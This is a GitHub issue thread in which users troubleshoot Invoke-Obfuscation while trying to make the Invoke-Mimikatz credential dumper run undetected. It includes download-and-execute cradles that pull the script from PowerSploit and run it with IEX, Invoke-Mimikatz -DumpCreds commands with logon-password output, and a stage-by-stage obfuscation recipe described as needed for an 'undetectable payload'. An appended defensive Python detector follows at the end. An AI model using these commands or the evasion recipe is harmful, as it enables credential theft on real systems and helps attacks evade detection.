VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new
PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might
be free).
At line:2224 char:4
+             Throw ("{13}{10}{18}{0}{30}{16}{14}{47}{50}{48}{4}{45}{43}{44}{12}{49}{41}{7} ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OperationStopped: (VirtualAlloc fa...might be free).:String) [], RuntimeException
    + FullyQualifiedErrorId : VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running
    the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the ad
  dress the PE wants might be free).

danielbohannon commented 7 years ago

Can you provide some more information?

For the obfuscated version of Invoke-Mimikatz what obfuscation command(s) are you running? Something like this?

Invoke-Obfuscation -ScriptPath 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1' -Command 'Token\All\1' -Quiet

Also, if you run a LOCAL de-obfuscated version of Invoke-Mimikatz with your default download cradle in PS2.0 then you will get the "Missing closing ')' in expression" error depending on how you downloaded Invoke-Mimikatz.

For example, if you download via .DownloadFile then you won't get this error, but if you download via .DownloadString piped to a local file then you will get this error.

Download copy of Invoke-Mimikatz to disk

$LocalFile = 'c:\users\me\mimi.ps1'
(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1') > $LocalFile

Invoke local copy of Invoke-Mimikatz

IEX (New-Object Net.Webclient).DownloadString($LocalFile)

Above command should error on PS2.0

So it seems that this is a PS2.0 download cradle error depending on formatting of target local file, and not an issue of obfuscation being applied to Invoke-Mimikatz script.

For the remaining issue you stated, I just need more information on how you are obfuscating Invoke-Mimikatz, and what the difference is between Invoke-Mimikatz.ps1 and .\test.ps1 in your provided examples.

Thanks for your patience. I'll try my best to get these issues hammered as soon as I can.

byt3bl33d3r commented 7 years ago

Hey sorry for the late response,

Thanks for the clarification on the IEX cradle issue, will try that asap.

I ran the same invoke-obfuscation command as before

Invoke-Obfuscation -ScriptPath ./Invoke-Mimikatz.ps1 -Command "TOKEN,ALL,1,OUT test.ps1" -Quiet

There shouldn't be any difference between Invoke-Mimikatz.ps1 and test.ps1, one was obfuscated using PowerShell on Linux and the other using PowerShell 2.0 on Windows 7. I did that initially just to rule out the possibility of it being an issue obfuscating the script using PowerShell on Linux.

Let me know if that cleared things up and if you need any more info.

newlog commented 7 years ago

Hi there,

I can give you some more detail from the tests I've been carrying out.

This is my PS version for Windows 10:

[17:53:09]:[..]/trialanderror$ $PSVersionTable

Name                           Value
----                           -----
PSVersion                      5.0.10586.672
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0...}
BuildVersion                   10.0.10586.672
CLRVersion                     4.0.30319.42000
WSManStackVersion              3.0
PSRemotingProtocolVersion      2.3
SerializationVersion           1.1.0.1

What I've done is run each Token obfuscation stage one after the other, checking which one failed. After my tests I can tell you that both the Type and Argument stages fail. The Argument stage gives an error similar to what @byt3bl33d3r shows for Windows 8.1 in his last message. The Type stage simply does not finish execution (obfuscation is fine, execution of the obfuscated script is not).

Here's a review of everything I did:

cd C:\Users\newlog\Documents\tools\mimikatz\powershell\Invoke-Mimikatz\custom\trialanderror
Import-Module .\<script>.ps1
Invoke-Mimikatz -DumpCreds

#
# 1.mimi_comments.ps1
#

$ Invoke-Obfuscation -ScriptPath '.\Invoke-Mimikatz.ps1' -Command 'Token\Comment\1' -Quiet > 1.mimi_comments.ps1

#
# 2.mimi_comments_whitespace.ps1
#

$ Invoke-Obfuscation -ScriptPath '.\mimi_comments.ps1' -Command 'Token\Whitespace\1' -Quiet > 2.mimi_comments_whitespace.ps1

#
# 3.mimi_comments_whitespace_type.ps1 (EXECUTION DOES NOT WORK - IT DOES NOT FINISH)
#

$ Invoke-Obfuscation -ScriptPath '.\2.mimi_comments_whitespace.ps1' -Command 'Token\Type\1' -Quiet > 3.mimi_comments_whitespace_type.ps1

#
# 4.mimi_comments_whitespace_variable.ps1
#

$ Invoke-Obfuscation -ScriptPath '.\2.mimi_comments_whitespace.ps1' -Command 'Token\Variable\1' -Quiet > 4.mimi_comments_whitespace_variable.ps1

#
# 5.mimi_comments_whitespace_variable_member.ps1
#

$ Invoke-Obfuscation -ScriptPath '.\4.mimi_comments_whitespace_variable.ps1' -Command 'Token\Member\1' -Quiet > 5.mimi_comments_whitespace_variable_member.ps1

#
# 6.mimi_comments_whitespace_variable_member_argument.ps1 (EXECUTION DOES NOT WORK - ERROR MESSAGE)
#

$ Invoke-Obfuscation -ScriptPath '.\5.mimi_comments_whitespace_variable_member.ps1' -Command 'Token\Argument\1' -Quiet > 6.mimi_comments_whitespace_variable_member_argument.ps1

#
# 7.mimi_comments_whitespace_variable_member_command.ps1
#

$ Invoke-Obfuscation -ScriptPath '.\5.mimi_comments_whitespace_variable_member.ps1' -Command 'Token\Command\1' -Quiet > 7.mimi_comments_whitespace_variable_member_command.ps1

#
# 8.mimi_comments_whitespace_variable_member_command_string.ps1
#

$ Invoke-Obfuscation -ScriptPath '.\7.mimi_comments_whitespace_variable_member_command.ps1' -Command 'Token\String\1' -Quiet > 8.mimi_comments_whitespace_variable_member_command_string.ps1

btw, the Argument stage is necessary to get an undetectable payload. Damn!

I attach the error message I get when Invoke-Mimikatz is obfuscated with the Argument stage: error_msg.txt

So definitively, there's something not working as expected.

Awesome work @danielbohannon It's really amazing what you did here!

danielbohannon commented 7 years ago

Are you still seeing these same issues with the latest commit? I'm still not able to reproduce this issue when applying these obfuscation steps (all level 1 obfuscation for each token type as you outlined above). Not sure what variable component I'm missing here but would love to help close this issue for you guys once I can reproduce it. Thanks for your help and patience.

vivami commented 7 years ago

Hi Daniel,

Thanks for this awesome project! I experience the same issue as @byt3bl33d3r. I obfuscate Invoke-Mimikatz from a Windows 10 1607 machine using your latest version 1.7 of Invoke-Obfuscation. Runs perfectly fine on the Windows 10 box:

PS C:\Users\MD\Documents\Invoke-Obfuscation-master> Import-Module .\MimiDogz_token.ps1
PS C:\Users\MD\Documents\Invoke-Obfuscation-master> INvoke-Mimikatz -DumpCreds

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 153000 (00000000:000255a8)
Session           : Interactive from 1
--SNIP--

However, below is the output when running this same obfuscated script on a Windows Server 2012 box (PS4.0). Hope this is of use to you. Let me know if I can try anything else:

PS C:\Users\Administrator\Desktop> $PSVersionTable

Name                           Value
----                           -----
PSVersion                      4.0
WSManStackVersion              3.0
SerializationVersion           1.1.0.1
CLRVersion                     4.0.30319.36366
BuildVersion                   6.3.9600.17400
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0}
PSRemotingProtocolVersion      2.2

PS C:\Users\Administrator\Desktop> Import-Module MimiDogz_token.ps1
PS C:\Users\Administrator\Desktop> INvoke-Mimikatz
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:438 char:3
+         ${m`EMCPY} =   (  &("{1}{0}" -f'iabLE','VAR') ("5Od"+"K") -vALUEoNLy )::("{0}{ ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:508 char:9
+         ${Cre`A`Te`RE`mOTEtHRE`AD} =   (&("{0}{1}"-f'va','rIable') ("{1}{0}" -f  ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+         [Byte[]]${vA`lue2by`TEs} =  ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g')  ("l1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+         if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict

danielbohannon commented 7 years ago

Man, this continues to stump me. I'm not seeing this error for PS 2, 3 or 4. I wonder if there's something peculiar to Windows Server 2012. Would you mind uploading the obfuscated script that you used to get the errors that you posted above? This will help me find out how to best replicate this issue so I can get it fixed. Thanks.

vivami commented 7 years ago

Sure, that script is uploaded here: https://cl.ly/jVlg I just tested it on Windows 8.1 (PS 4.0) as well, and it gives the exact same error(s).

newlog commented 7 years ago

@danielbohannon I cannot confirm, but downloading the ModernIE VMs might help you reproduce the issue. There you will get a standard Windows 7/8/10 machine with their default PowerShell version.

https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

After further testing, I can tell you for sure that some stages are not working on Win7 with the default (I hope) PS while working on Win10. Sorry I cannot give you more feedback than that.

byt3bl33d3r commented 7 years ago

@danielbohannon bump. Any update on this issue?

danielbohannon commented 7 years ago

@byt3bl33d3r -- thanks for holding my feet to the fire :) Unfortunately I've not had a chance to get a VM setup where I can successfully reproduce this issue. I've got a couple long flights in the coming weeks so hopefully I can sink some time into reproducing this issue and getting this resolved. This issue has been open for far longer than I like, so my apologies for that.

byt3bl33d3r commented 7 years ago

@danielbohannon no worries! Thanks for the update! Anything else I can do to help let me know. Cheers man.

kofa2002 commented 5 years ago

thank you all for this information

bwiltse commented 5 years ago

I just came across this issue myself. It was PowerShell in Kali rolling, with PowerShell 6.1.0. Obfuscating the same payload from Empire in Windows 10 worked without issue.

dr0pd34d commented 5 years ago

I currently have the same problem on two Windows hosts. I used the following command line:

Invoke-Obfuscation -ScriptPath 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1' -Command 'Token\All\1' -Quiet > Kingdom3.ps1


On my Windows 10 hosts with the following PowerShell version:

Name                           Value
----                           -----
PSVersion                      5.1.17134.228
PSEdition                      Desktop
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0...}
BuildVersion                   10.0.17134.228
CLRVersion                     4.0.30319.42000
WSManStackVersion              3.0
PSRemotingProtocolVersion      2.3
SerializationVersion           1.1.0.1


Running the following commands:

PS C:\Test> IEX (New-Object Net.WebClient).DownloadString("C:\Test\Kingdom3.ps1")
PS C:\Test> INVOKE-MIMIkAtz
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:825 char:6

You cannot call a method on a null-valued expression.
At line:832 char:6

Cannot find an overload for "GetDelegateForFunctionPointer" and the argument count: "2".
At line:428 char:3

Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:825 char:6


Has there already been a solution? Thanks!
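Seen from the detection side, the obfuscated lines quoted in the error output earlier in this thread carry three token-level markers: backticks inside identifiers, `-f` format strings made only of reordered placeholders, and concatenated string literals. The following is an added example, not part of the thread or of Invoke-Obfuscation, that counts those markers and undoes them so plain keyword rules can match again; the function names, weights and threshold are assumptions chosen for illustration.

```python
import re

# First three lines are copied from the error output quoted in this thread
# (cut where the console truncated them); the fourth is a constructed benign line.
SAMPLES = r'''
${m`EMCPY} =   (  &("{1}{0}" -f'iabLE','VAR') ("5Od"+"K") -vALUEoNLy )::("{0}{
${Cre`A`Te`RE`mOTEtHRE`AD} =   (&("{0}{1}"-f'va','rIable') ("{1}{0}" -f
if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
$count = (Get-ChildItem -Path $env:TEMP).Count
'''.strip().splitlines()

_STR = r'''(?:'[^']*'|"[^"]*")'''  # one quoted PowerShell string literal
# Template consisting only of {n} placeholders, followed by -f and its arguments.
FORMAT_RE = re.compile(
    r'''["']((?:\{\d+\})+)["']\s*-f\s*(''' + _STR + r'''(?:\s*,\s*''' + _STR + r''')*)''',
    re.I)
# Two or more string literals joined with "+".
CONCAT_RE = re.compile(_STR + r'''(?:\s*\+\s*''' + _STR + r''')+''')
# Backtick placed directly before a letter.
TICK_RE = re.compile(r'`(?=[A-Za-z])')


def _resolve_format(m):
    """Rebuild the string a placeholder-only -f expression evaluates to."""
    order = [int(i) for i in re.findall(r'\{(\d+)\}', m.group(1))]
    args = [a[1:-1] for a in re.findall(_STR, m.group(2))]
    if max(order) >= len(args):  # truncated or malformed: leave untouched
        return m.group(0)
    return "'" + ''.join(args[i] for i in order) + "'"


def _resolve_concat(m):
    """Join concatenated literals into one literal."""
    return "'" + ''.join(p[1:-1] for p in re.findall(_STR, m.group(0))) + "'"


def normalize(line):
    """Undo the three markers and lowercase the result.

    Heuristic: removing every backtick-before-letter also drops genuine
    escapes such as `n, which is acceptable for identifier matching only.
    """
    out = FORMAT_RE.sub(_resolve_format, line)
    out = CONCAT_RE.sub(_resolve_concat, out)
    out = TICK_RE.sub('', out)
    return out.lower()


def analyze(line, threshold=2):
    """Count markers on the raw line and score it (weights are assumptions)."""
    counts = {
        'tick': len(TICK_RE.findall(line)),
        'format': len(FORMAT_RE.findall(line)),
        'concat': len(CONCAT_RE.findall(line)),
    }
    score = counts['tick'] + 3 * counts['format'] + 2 * counts['concat']
    return {
        'counts': counts,
        'score': score,
        'flagged': score >= threshold,
        'normalized': normalize(line),
    }


if __name__ == '__main__':
    for sample in SAMPLES:
        result = analyze(sample)
        print(result['flagged'], result['score'], result['counts'])
        print('   ', result['normalized'])
```

The same functions can be run over the script text recorded by PowerShell script block logging, with keyword rules applied to the normalized output rather than the raw line.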